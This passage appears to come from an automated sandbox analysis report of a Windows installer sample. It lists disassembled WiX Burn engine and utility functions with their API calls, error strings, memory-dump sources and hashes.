                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterHeapLeave$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate memory for RPC pipe results.$Failed to read result and size of message.$Failed to read result data.$Failed to send RPC pipe request.$RPC pipe client reported failure.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
                                                                                                                                                          • API String ID: 3222683422-2547529255
                                                                                                                                                          • Opcode ID: 1cf6b7393490818458115fd038282b692590232bf1bd8daf17f28089551c526e
                                                                                                                                                          • Instruction ID: fb5d212647e457558a5f4a425b417711250e8abf332fa48c6e9ac7ae8b14b124
                                                                                                                                                          • Opcode Fuzzy Hash: 1cf6b7393490818458115fd038282b692590232bf1bd8daf17f28089551c526e
                                                                                                                                                          • Instruction Fuzzy Hash: F8312772E40625B7DB219E5ACC45FAB7AA8EB06720F104067F904BB2D1E3788D10C7A6
                                                                                                                                                          Function 0040A2DB Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 111COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,00000000,00000000,?,?,?,00409D68,00000000,?,00000000,?,00000000,?,00419CB9), ref: 0040A2EE
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,7FFFFFFE,?,00409D68,00000000,?,00000000,?,00000000,?,00419CB9,?,00000001,00000000), ref: 0040A40A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3168844106-1038398555
                                                                                                                                                          • Opcode ID: 0f364b27bfea64f556fec603b122150f34ddfd3a44f802e5bf0812e60bfe16f1
                                                                                                                                                          • Instruction ID: d26fde41b9907a4a6ee64ced8b5e37a37ee9cbd3c2c7088a12c52b34c7298491
                                                                                                                                                          • Opcode Fuzzy Hash: 0f364b27bfea64f556fec603b122150f34ddfd3a44f802e5bf0812e60bfe16f1
                                                                                                                                                          • Instruction Fuzzy Hash: B1310831A40715BBDB115E91CC4AF9B7A24EB04754F108137FE087A1D1D7B8AD609BDA
                                                                                                                                                          Function 0042BA90 Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0042BA9D
                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 0042BB15
                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0042BB2C
                                                                                                                                                            • Part of subcall function 0042B8C0: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000014,?,00000060,?,?,00000000,?,0042B7AA,?,00000060), ref: 0042B8FE
                                                                                                                                                          • DefWindowProcW.USER32(?,00000082,?,?), ref: 0042BB43
                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0042BB51
                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 0042BB58
                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0042BB6C
                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,00000000), ref: 0042BB9C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$LongProc$MessagePost$Quit
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3225497149-0
                                                                                                                                                          • Opcode ID: f6cb6c2e9ca2157e1ce532efda27058381e820e59cc1259a910d47c916880e94
                                                                                                                                                          • Instruction ID: b5b520d1a8b9de040d5f554b83bfd9cb2558af9b2e96d025f02b5e7f0b79d5bc
                                                                                                                                                          • Opcode Fuzzy Hash: f6cb6c2e9ca2157e1ce532efda27058381e820e59cc1259a910d47c916880e94
                                                                                                                                                          • Instruction Fuzzy Hash: 9231B631200214BFDB219F69ED58E7B7F78FF45310F840929FD0691A65C738A950DBA8
                                                                                                                                                          Function 0045A80B Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                          • Opcode ID: d740373a796c647a3a5bb182f48518dc6db7802a7f15071f7a239df656ac23f6
                                                                                                                                                          • Instruction ID: ab364f170817a6f15c44f83033391856f1a43e22637c9021e9cc4ac3df08116a
                                                                                                                                                          • Opcode Fuzzy Hash: d740373a796c647a3a5bb182f48518dc6db7802a7f15071f7a239df656ac23f6
                                                                                                                                                          • Instruction Fuzzy Hash: DDB147729002659FDB118F24CC41BAF7BA5EF15311F15825BED04AB383D278AD19C7AA
                                                                                                                                                          Function 00428840 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 265synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleMutexRelease
                                                                                                                                                          • String ID: ElevatedOnExecuteActionComplete failed.$Failed to save state.$Unexpected elevated message sent to child process, msg: %u$d:\a\wix\wix\src\burn\engine\elevation.cpp
                                                                                                                                                          • API String ID: 4207627910-2686070462
                                                                                                                                                          • Opcode ID: 62be503d2ad4154d0c53f087231124767b2edfe9a15f3238d5d8a59c6016eb31
                                                                                                                                                          • Instruction ID: b20fd9f626e1d565b573a8ba7576a5df92a0013d2bd6659ce647c29ec30ab256
                                                                                                                                                          • Opcode Fuzzy Hash: 62be503d2ad4154d0c53f087231124767b2edfe9a15f3238d5d8a59c6016eb31
                                                                                                                                                          • Instruction Fuzzy Hash: 5DB1287A200614FFCB229F80DD01C5ABBB6FF08714751885EFA9A56531C776F921EB09
                                                                                                                                                          Function 00472598 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 187COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00472327,00000000,00000000,00472AD6,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00000000), ref: 004725BC
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to get HTTP status code for failed request to URL: %ls, xrefs: 004725F5
                                                                                                                                                          • Failed to get HTTP status code for request to URL: %ls, xrefs: 00472792
                                                                                                                                                          • Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 004725D3
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 004727A1
                                                                                                                                                          • Failed to get redirect url: %ls, xrefs: 0047277F
                                                                                                                                                          • Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00472755
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                          • API String ID: 1452528299-65429539
                                                                                                                                                          • Opcode ID: f030106e939e5b9fdf07d1c9f6d2fe6abf0eeac315f4b65bda27fa0f41c06e1d
                                                                                                                                                          • Instruction ID: 9c6db9820ea08f70ab912f616f3ee0211593f8050b097ac1174601344628568e
                                                                                                                                                          • Opcode Fuzzy Hash: f030106e939e5b9fdf07d1c9f6d2fe6abf0eeac315f4b65bda27fa0f41c06e1d
                                                                                                                                                          • Instruction Fuzzy Hash: 42515C79640115A7DB290E68CF49FF73A69EB11350F25C267FC08EB3A0D2EDCD009A99
                                                                                                                                                          Function 0040868F Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 159COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID: Failed to dequeue action.$Failed to start bootstrapper application.$Failed to wait on queue event.$d:\a\wix\wix\src\burn\engine\engine.cpp$msasn1.dll
                                                                                                                                                          • API String ID: 2962429428-1970089462
                                                                                                                                                          • Opcode ID: 08ee04f5a28173d9e307fa9a0b393fecb16c680870471751fba835454586a358
                                                                                                                                                          • Instruction ID: e78bdd81256244f1faced098cdae675dd0c43d189fd5f413cf8f190ca3278cf9
                                                                                                                                                          • Opcode Fuzzy Hash: 08ee04f5a28173d9e307fa9a0b393fecb16c680870471751fba835454586a358
                                                                                                                                                          • Instruction Fuzzy Hash: DA519472900205ABEB10EF95CD46F9E77B4AB44714F24447FF948BB2C2EB789940CB69
                                                                                                                                                          Function 00475C80 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 154timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00475DA2
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00475DAC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$ErrorFileLastSystem
                                                                                                                                                          • String ID: Failed to convert system time to file time.$Failed to copy time.$clbcatq.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\timeutil.cpp
                                                                                                                                                          • API String ID: 2781989572-1666417576
                                                                                                                                                          • Opcode ID: 82ff30d12897d098bcd6a084b5417339352cfe6c37de53699f77098eb093dc65
                                                                                                                                                          • Instruction ID: 9f771ce17d99a5a38c8cc58e2e16cc896985064f6127ca0013d9ac373b90e8bf
                                                                                                                                                          • Opcode Fuzzy Hash: 82ff30d12897d098bcd6a084b5417339352cfe6c37de53699f77098eb093dc65
                                                                                                                                                          • Instruction Fuzzy Hash: 8741E561A507057AE7309BB58C4ABFF6628EF91701F14C52FB509BE290D9ACCE018369
                                                                                                                                                          Function 0046B5CB Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 145COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(0040951C), ref: 0046B601
                                                                                                                                                            • Part of subcall function 0046ADB1: GetModuleHandleA.KERNEL32(kernel32.dll,0040951C,00000000,0040959C,?,0046B612,00000000,0040951C,00000000,?,?,00422D30,0040951C,?,0040951C,?), ref: 0046ADCF
                                                                                                                                                            • Part of subcall function 0046ADB1: GetLastError.KERNEL32(?,0046B612,00000000,0040951C,00000000,?,?,00422D30,0040951C,?,0040951C,?,0040951C,?,?,?), ref: 0046ADDB
                                                                                                                                                          Strings
                                                                                                                                                          • failed XmlCreateDocument, xrefs: 0046B624
                                                                                                                                                          • failed put_validateOnParse, xrefs: 0046B665
                                                                                                                                                          • failed put_resolveExternals, xrefs: 0046B6A1
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B633, 0046B674
                                                                                                                                                          • failed loadXML, xrefs: 0046B711
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed loadXML$failed put_resolveExternals$failed put_validateOnParse
                                                                                                                                                          • API String ID: 52713655-1521560163
                                                                                                                                                          • Opcode ID: dd527d37651f38d19374d01cb61ef82be83413fe3ebfc4970b5ffa72f9e3d7a7
                                                                                                                                                          • Instruction ID: c114c7170ab4305b47a74bdd37cce4ef73e0d2c36ddccc9cf699fce8dfe2e6fa
                                                                                                                                                          • Opcode Fuzzy Hash: dd527d37651f38d19374d01cb61ef82be83413fe3ebfc4970b5ffa72f9e3d7a7
                                                                                                                                                          • Instruction Fuzzy Hash: 7B419175A40218ABDB01DFA8CC45F9E77B9EF99710F11006AF905FB390EA749940CB9A
                                                                                                                                                          Function 0041C2E3 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 137sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?), ref: 0041C364
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Sleep
                                                                                                                                                          • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$d:\a\wix\wix\src\burn\engine\cache.cpp$per-machine$per-user
                                                                                                                                                          • API String ID: 3472027048-2232460834
                                                                                                                                                          • Opcode ID: a4306cf5b63cabd9460afd90865a9243023176ef8523b7a0b30e936551671917
                                                                                                                                                          • Instruction ID: 46663f98a0f68daa438de3c7f801629374ac422da265a986d32ea24906f7d277
                                                                                                                                                          • Opcode Fuzzy Hash: a4306cf5b63cabd9460afd90865a9243023176ef8523b7a0b30e936551671917
                                                                                                                                                          • Instruction Fuzzy Hash: 4C412971AC0218B7EB216A95CC86FEF7668DB00F55F108027BE04F9291D67CCE9097AD
                                                                                                                                                          Function 0040B390 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 134COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040B517
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040B529
                                                                                                                                                          • Failed to get OS info., xrefs: 0040B3E5
                                                                                                                                                          • Failed to create VersionNT from QWORD., xrefs: 0040B4DA
                                                                                                                                                          • Failed to create VersionNT64 from QWORD., xrefs: 0040B49E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID: Failed to create VersionNT from QWORD.$Failed to create VersionNT64 from QWORD.$Failed to get OS info.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3664257935-876919890
                                                                                                                                                          • Opcode ID: cbd070244d7b9a14f93cd00cc3061431cd504c573364d65d6df6ba3d8a488d09
                                                                                                                                                          • Instruction ID: e36f754ff1fead06bbe7f28332f5ac6cae7c514da95c63816cadd684e98bd7bc
                                                                                                                                                          • Opcode Fuzzy Hash: cbd070244d7b9a14f93cd00cc3061431cd504c573364d65d6df6ba3d8a488d09
                                                                                                                                                          • Instruction Fuzzy Hash: 28418571E41239B6DB319B25CC46BEA76B8EB48704F1001E7F548B6281E778DF84CA9D
                                                                                                                                                          Function 0046832A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                          • String ID: Error reading wix version registry value due to unexpected data type: %u$Failed to convert registry string to wix version.$Failed to copy QWORD wix version value.$Failed to read wix version registry value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 2001391462-2685011744
                                                                                                                                                          • Opcode ID: e14ff5603b825adcf5587de066c0d77c1af8c42270fb23ef9cf0da2d6711ad4d
                                                                                                                                                          • Instruction ID: a02b9f1744c484a60712742329ac96512ae134e398bed0db75775d2749c6c2d5
                                                                                                                                                          • Opcode Fuzzy Hash: e14ff5603b825adcf5587de066c0d77c1af8c42270fb23ef9cf0da2d6711ad4d
                                                                                                                                                          • Instruction Fuzzy Hash: 7C41D771E80319BADB319A858C4EFAF7B78DF51B54F10415FF9007A280FA784E00C6AA
                                                                                                                                                          Function 00454140 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00454177
                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0045417F
                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00454208
                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00454233
                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00454288
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
